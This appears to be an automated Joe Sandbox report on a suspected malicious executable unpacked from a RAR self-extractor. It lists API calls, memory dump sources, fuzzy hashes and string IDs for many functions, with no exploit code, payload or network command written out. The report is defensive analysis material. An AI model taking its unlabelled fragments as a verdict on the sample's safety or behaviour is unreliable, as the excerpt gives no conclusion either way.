                                                              • Instruction ID: 6b3d3956c39599a488e2fa72762b3c4a96dccd055844b922c15e9dd2c94b4c48
                                                              • Opcode Fuzzy Hash: 63c6fad0c27308e77c94dfd6c17512139325cb4e89b7834529790c3a0696a99a
                                                              • Instruction Fuzzy Hash: ED51E672619B029FDF298F58D851BBA77B4EF44304F14551DE885B72A2E731EC88CB90
                                                              APIs
                                                              • GetEnvironmentStringsW.KERNEL32 ref: 00EA08B9
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00EA08DC
                                                                • Part of subcall function 00E9DA90: RtlAllocateHeap.NTDLL(00000000,?,?,?,00E98B1E,?,0000015D,?,?,?,?,00E99FFA,000000FF,00000000,?,?), ref: 00E9DAC2
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00EA0902
                                                              • _free.LIBCMT ref: 00EA0915
                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00EA0924
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                              • String ID:
                                                              • API String ID: 336800556-0
                                                              • Opcode ID: e2bba399b324f0bee222dda3271017e78eb912c81897839881ad605e782ad4f9
                                                              • Instruction ID: 0f2e664933da132e7aab5e7d37bb9779c4abee4b64e8f445a6b6e65d25d2e7e1
                                                              • Opcode Fuzzy Hash: e2bba399b324f0bee222dda3271017e78eb912c81897839881ad605e782ad4f9
                                                              • Instruction Fuzzy Hash: 6A01D8727026197F376116665D8CC7B6AADEECFB943140129B904EB142DE60AD0181B0
                                                              APIs
                                                              • _free.LIBCMT ref: 00EA1197
                                                                • Part of subcall function 00E9D758: RtlFreeHeap.NTDLL(00000000,00000000,?,00EA1216,?,00000000,?,00000000,?,00EA123D,?,00000007,?,?,00EA163A,?), ref: 00E9D76E
                                                                • Part of subcall function 00E9D758: GetLastError.KERNEL32(?,?,00EA1216,?,00000000,?,00000000,?,00EA123D,?,00000007,?,?,00EA163A,?,?), ref: 00E9D780
                                                              • _free.LIBCMT ref: 00EA11A9
                                                              • _free.LIBCMT ref: 00EA11BB
                                                              • _free.LIBCMT ref: 00EA11CD
                                                              • _free.LIBCMT ref: 00EA11DF
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 703955d041823f7f35ba9073b3620000da6fb047858c7a54cb18f8ecfe76a8ca
                                                              • Instruction ID: f7148923f35b152e28554e8119d64c6c184ff573e0811926fa6dd938ee63022a
                                                              • Opcode Fuzzy Hash: 703955d041823f7f35ba9073b3620000da6fb047858c7a54cb18f8ecfe76a8ca
                                                              • Instruction Fuzzy Hash: 7CF04F32549618AFCA60DBA5EDC6C2A77EDAB05314BA42846F20CFB540CA30FD808650
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 00E87D4E
                                                              • _wcslen.LIBCMT ref: 00E87D5F
                                                              • _wcslen.LIBCMT ref: 00E87D6F
                                                              • _wcslen.LIBCMT ref: 00E87D7D
                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00E82E75,?,?,00000000,?,?,?), ref: 00E87D98
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _wcslen$CompareString
                                                              • String ID:
                                                              • API String ID: 3397213944-0
                                                              • Opcode ID: 95f2bd16391915cc692f2e71e5d805c7915daac8eb9561c416343544ff5119ca
                                                              • Instruction ID: 9f0274273fadf22e19cfae61dd051a75f118a49e6ab92c20c82143b799ff3c74
                                                              • Opcode Fuzzy Hash: 95f2bd16391915cc692f2e71e5d805c7915daac8eb9561c416343544ff5119ca
                                                              • Instruction Fuzzy Hash: 95F01D32008114BBCF222F91DC49DDA3F66EF46770B21A416F65DBA0A1CE32D555D7D0
                                                              APIs
                                                                • Part of subcall function 00E8F8B9: GetDC.USER32(00000000), ref: 00E8F8BD
                                                                • Part of subcall function 00E8F8B9: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E8F8C8
                                                                • Part of subcall function 00E8F8B9: ReleaseDC.USER32(00000000,00000000), ref: 00E8F8D3
                                                              • GetObjectW.GDI32(?,00000018,?), ref: 00E8FA5C
                                                                • Part of subcall function 00E8FCE9: GetDC.USER32(00000000), ref: 00E8FCF2
                                                                • Part of subcall function 00E8FCE9: GetObjectW.GDI32(?,00000018,?), ref: 00E8FD21
                                                                • Part of subcall function 00E8FCE9: ReleaseDC.USER32(00000000,?), ref: 00E8FDB9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ObjectRelease$CapsDevice
                                                              • String ID: ($4
                                                              • API String ID: 1061551593-1598383727
                                                              • Opcode ID: 5551ca7be093eae5d25e8883e27b4267937182f183b547e4d6462bee8af65e38
                                                              • Instruction ID: 64468b9243ab92e8ceeca35d930964d2de2354b9a9e077608c0e4935ae42aede
                                                              • Opcode Fuzzy Hash: 5551ca7be093eae5d25e8883e27b4267937182f183b547e4d6462bee8af65e38
                                                              • Instruction Fuzzy Hash: 8691E271604754AFC714EF25E844A6BBBF8FBC9710F10486DF99AE7260DB30A905CB62
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _swprintf
                                                              • String ID: %ls$%s: %s
                                                              • API String ID: 589789837-2259941744
                                                              • Opcode ID: 5ddfb562a947fc786d9b025ce5cca1e498d51e1dc34deea04a4bed6dd4f54efd
                                                              • Instruction ID: fbc78655667612b3f9d2f4e3d1efddb57c027b0ed06204cb301438b2e091e705
                                                              • Opcode Fuzzy Hash: 5ddfb562a947fc786d9b025ce5cca1e498d51e1dc34deea04a4bed6dd4f54efd
                                                              • Instruction Fuzzy Hash: 4751D63554C305FEEB213A94CD06FB67A95EB04B40F30A416B7DE744E1DAA1E610BB13
                                                              APIs
                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe,00000104), ref: 00E9C8F3
                                                              • _free.LIBCMT ref: 00E9C9BE
                                                              • _free.LIBCMT ref: 00E9C9C8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$FileModuleName
                                                              • String ID: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe
                                                              APIs
                                                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00E97B7B
                                                              • _abort.LIBCMT ref: 00E97C86
                                                              Strings
                                                              Yara matches
                                                              Similarity
                                                              • API ID: EncodePointer_abort
                                                              • String ID: MOC$RCC
                                                              APIs
                                                              Strings
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID: D+$}
                                                              APIs
                                                              • __fprintf_l.LIBCMT ref: 00E83FB4
                                                              • _strncpy.LIBCMT ref: 00E83FFA
                                                                • Part of subcall function 00E87B46: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00E8498A,?,00000000,00000000,?,?,?,00E8498A,?,?,00000050), ref: 00E87B63
                                                              Strings
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                              • String ID: $%s$@%s
                                                              APIs
                                                                • Part of subcall function 00E811E6: GetDlgItem.USER32(00000000,00003021), ref: 00E8122A
                                                                • Part of subcall function 00E811E6: SetWindowTextW.USER32(00000000,00EA8574), ref: 00E81240
                                                              • EndDialog.USER32(?,00000001), ref: 00E902FE
                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00E90316
                                                              • SetDlgItemTextW.USER32(?,00000067,?), ref: 00E90344
                                                              Strings
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ItemText$DialogWindow
                                                              • String ID: GETPASSWORD1
                                                              APIs
                                                              • _swprintf.LIBCMT ref: 00E876E6
                                                                • Part of subcall function 00E839A9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E839BC
                                                                • Part of subcall function 00E817D7: GetLastError.KERNEL32(00E81950,00000000,00000400), ref: 00E817D7
                                                                • Part of subcall function 00E817D7: FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00E817F8
                                                              • GetLastError.KERNEL32(?,00000200), ref: 00E8772E
                                                              • SetLastError.KERNEL32(00000000,?,00000000,00000096,00000035), ref: 00E8775C
                                                                • Part of subcall function 00E868A5: _wcslen.LIBCMT ref: 00E868AB
                                                              Strings
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast$FormatMessage__vswprintf_c_l_swprintf_wcslen
                                                              • String ID: D+
                                                              APIs
                                                              • VirtualQuery.KERNEL32(80000000,C5,0000001C,00E93738,00000000,?,?,?,?,?,?,?,00E93543,00000004,00EE832C,00E937C8), ref: 00E9360F
                                                              • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00E93543,00000004,00EE832C,00E937C8), ref: 00E9362A
                                                              Strings
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InfoQuerySystemVirtual
                                                              • String ID: C5$D
                                                              Strings
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RENAMEDLG$REPLACEFILEDLG
                                                              APIs
                                                              • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00E92C0C
                                                              • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00E92C48
                                                              Strings
                                                              Yara matches
                                                              Similarity
                                                              • API ID: EnvironmentVariable
                                                              • String ID: sfxcmd$sfxpar
                                                              APIs
                                                              Yara matches
                                                              Similarity
                                                              • API ID: __alldvrm$_strrchr
                                                              • String ID:
                                                              APIs
                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000), ref: 00E82858
                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800), ref: 00E8289C
                                                              • SetFileTime.KERNEL32(?,?,?,00000000), ref: 00E8291D
                                                              • CloseHandle.KERNEL32(?), ref: 00E82924
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$Create$CloseHandleTime
                                                              • String ID:
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(?,00000000,6AE85006,00E9905E,00000000,00000000,00E9A093,?,00E9A093,?,00000001,00E9905E,6AE85006,00000001,00E9A093,00E9A093), ref: 00EA1355
                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00EA13DE
                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00EA13F0
                                                              • __freea.LIBCMT ref: 00EA13F9
                                                                • Part of subcall function 00E9DA90: RtlAllocateHeap.NTDLL(00000000,?,?,?,00E98B1E,?,0000015D,?,?,?,?,00E99FFA,000000FF,00000000,?,?), ref: 00E9DAC2
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                              • String ID:
                                                              • API String ID: 2652629310-0
                                                              • Opcode ID: 8875755e58274e4c90adbfff3637c7de8fd65c5756e29a3e2aab2127be917b73
                                                              • Instruction ID: 6ef7bb1a0b0db969e939399037eaaf2ad21dbe481befcadb9da96b3c28fe353b
                                                              • Opcode Fuzzy Hash: 8875755e58274e4c90adbfff3637c7de8fd65c5756e29a3e2aab2127be917b73
                                                              • Instruction Fuzzy Hash: FE31DF72A0021AAFDF249F64CC45DAF3BA5EB49314F0501A8FC04EB250EB35ED59CB90
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 00E8F886
                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00E8F895
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E8F8A3
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00E8F8B1
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CapsDevice$Release
                                                              • String ID:
                                                              • API String ID: 1035833867-0
                                                              • Opcode ID: 1e27a9fb2dd4a5a7fbdcfb8415abde03f3c98b4b7677a91bc8ec497d254581fe
                                                              • Instruction ID: 6d513d003270d1955738f7c4a473badbd0984877b37cd4f6dc52a3e8f5822cd1
                                                              • Opcode Fuzzy Hash: 1e27a9fb2dd4a5a7fbdcfb8415abde03f3c98b4b7677a91bc8ec497d254581fe
                                                              • Instruction Fuzzy Hash: 5EE08C71942771AFD3A01B62AC4CF8A3AA4AB09712F050161FA05BA2D1C67084088B90
                                                              APIs
                                                              • _free.LIBCMT ref: 00E9FCA4
                                                                • Part of subcall function 00E9D96C: IsProcessorFeaturePresent.KERNEL32(00000017,00E9D95B,00000003,?,00000000,00E9D720,00000000,00000016,?,?,00E9D968,00000000,00000000,00000000,00000000,00000000), ref: 00E9D96E
                                                                • Part of subcall function 00E9D96C: GetCurrentProcess.KERNEL32(C0000417,?,00000003,00E9E188), ref: 00E9D990
                                                                • Part of subcall function 00E9D96C: TerminateProcess.KERNEL32(00000000,?,00000003,00E9E188), ref: 00E9D997
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                              • String ID: *?$.
                                                              • API String ID: 2667617558-3972193922
                                                              • Opcode ID: 04a8c1315428eb77e5661f47ed1524956a01f530d4904b9d9e4da6d5b0807b3e
                                                              • Instruction ID: 85352de58d31d920cf178b3cc10d91ca109a632950092c14ca3a774257e7b400
                                                              • Opcode Fuzzy Hash: 04a8c1315428eb77e5661f47ed1524956a01f530d4904b9d9e4da6d5b0807b3e
                                                              • Instruction Fuzzy Hash: EF518D72E0021AAFDF14DFA8C881AADFBF5EF48314F24917AE854F7340E6319A018B50
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _wcschr
                                                              • String ID: *
                                                              • API String ID: 2691759472-163128923
                                                              • Opcode ID: ee27a419c0e6f513f4b91ce8a0b5b64f7f8ca0b0a56611310b7316463f2eddf9
                                                              • Instruction ID: 81ce393dc3f0c39c9e59248e4e832c7c5f9a917ba3026acecf082e74e83705e2
                                                              • Opcode Fuzzy Hash: ee27a419c0e6f513f4b91ce8a0b5b64f7f8ca0b0a56611310b7316463f2eddf9
                                                              • Instruction Fuzzy Hash: 02312832748311AA8A30BB549902A7BB3F4EF91B58F15A40EFF8D77180E7229D46D361
                                                              APIs
                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,?,00E8EA66,00000000,?), ref: 00E8E909
                                                              • SetWindowTextW.USER32(00000000,00000000), ref: 00E8E913
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Window$ShowText
                                                              • String ID: 1
                                                              • API String ID: 1551406749-1475023258
                                                              • Opcode ID: dbf927ce8bc235460ed130c4f67f601348d471c09927c08ebda42f3af659de6c
                                                              • Instruction ID: 6980ddda8df1d704d4d534f1b788a2ab978263cfb8a36026c4d9e32ebee9ec4f
                                                              • Opcode Fuzzy Hash: dbf927ce8bc235460ed130c4f67f601348d471c09927c08ebda42f3af659de6c
                                                              • Instruction Fuzzy Hash: B1315C7260071AAFC709EF65EC84A2ABBE8BF8D304B14045DF549A7360DF61BC05CBA1
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID: x7
                                                              • API String ID: 269201875-374306512
                                                              • Opcode ID: efb26f161a85536b87cbacafdb247f78bf9276994478757c688f85364d1b2643
                                                              • Instruction ID: 2d4a970a43d288df3a8dc6ee3b3b7049916c1d3be6168e773217c9bff9647541
                                                              • Opcode Fuzzy Hash: efb26f161a85536b87cbacafdb247f78bf9276994478757c688f85364d1b2643
                                                              • Instruction Fuzzy Hash: 751108B1A002509FEF64DF39AD86B5633D4A780774F982626FA28FF3D0EB70D8454284
                                                              APIs
                                                                • Part of subcall function 00E9E105: GetLastError.KERNEL32(?,?,00E98F0C,?,?,?,00E98987,00000050), ref: 00E9E109
                                                                • Part of subcall function 00E9E105: _free.LIBCMT ref: 00E9E13C
                                                                • Part of subcall function 00E9E105: SetLastError.KERNEL32(00000000), ref: 00E9E17D
                                                                • Part of subcall function 00E9E105: _abort.LIBCMT ref: 00E9E183
                                                              • _abort.LIBCMT ref: 00EA0500
                                                              • _free.LIBCMT ref: 00EA0534
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast_abort_free
                                                              • String ID: @;
                                                              • API String ID: 289325740-3452451375
                                                              • Opcode ID: 61015cfa96421d4c2e22a9312a236f314a1a536771565ed43bb7a8af9acf728c
                                                              • Instruction ID: 3fd6c7dc1a5c2d6c984eb41d55e4599a540573eeef8326f06bdf6025daa0fe24
                                                              • Opcode Fuzzy Hash: 61015cfa96421d4c2e22a9312a236f314a1a536771565ed43bb7a8af9acf728c
                                                              • Instruction Fuzzy Hash: E3019B71D057259FCB319F6D984255EB3B0BF0AB25B15120AE4247B281C730BE41CFC5
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _swprintf
                                                              • String ID: z%s%02d$z%s%d
                                                              • API String ID: 589789837-468824935
                                                              • Opcode ID: 302f7109c5f9fb98198f6a8d1b9863b17e0c878d6ea97fe1cba6634e02c3bf33
